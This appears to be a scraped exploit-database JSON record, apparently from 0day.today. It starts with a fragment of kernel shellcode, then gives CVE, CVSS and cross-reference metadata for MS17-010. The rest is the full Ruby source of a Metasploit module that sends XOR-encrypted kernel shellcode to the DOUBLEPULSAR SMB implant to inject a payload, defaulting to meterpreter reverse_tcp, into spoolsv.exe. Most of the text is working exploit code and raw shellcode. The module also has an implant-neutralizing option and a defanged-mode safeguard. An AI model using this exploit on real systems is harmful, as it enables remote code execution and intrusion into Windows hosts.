\"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-29] #"}, "lastseen": "2021-10-28T22:18:51", "differentElements": ["sourceData"], "edition": 59}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "38dbaca43a74cd9829b2d2be866c90e7", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-29T22:21:24", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-29T22:21:24", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-29T22:21:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n 